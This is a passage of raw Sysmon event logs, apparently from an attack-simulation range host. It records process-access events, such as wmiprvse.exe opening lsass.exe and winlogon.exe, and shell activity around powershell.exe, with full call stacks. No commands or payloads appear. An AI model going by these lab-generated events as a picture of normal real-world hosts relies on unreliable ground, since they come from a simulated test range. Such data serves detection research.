fmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149711Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149710Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149709Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149708Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149707Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149706Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149705Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149704Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149703Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.534{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149702Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.400{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10AF3B2C7AC2195C729F1165F764020B,SHA256=BDC80FA4070704DC29D281CE81DDEC7F543649BAC1678A2568734C893BA6DF87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149701Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149700Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149699Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149698Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149697Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149696Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149695Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}54725316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149694Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.363{39BD8DE3-7094-60CA-060D-00000000D101}5472WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF17c4b0a.TMPMD5=E4A1ED1EE18BF898BAD19BA4240947F3,SHA256=AC592984A438A7C4C76698B7FB799586A781C242C3A03D5092516610B0725AAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149693Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.300{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149692Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.263{39BD8DE3-0F65-60CA-1600-00000000D101}1164476C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149691Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.263{39BD8DE3-0F65-60CA-1600-00000000D101}11641220C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149690Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149689Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149688Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8700-00000000D101}32161156C:\Windows\system32\taskhostw.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149687Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8700-00000000D101}32161156C:\Windows\system32\taskhostw.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149686Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885476C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149685Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885476C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149684Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 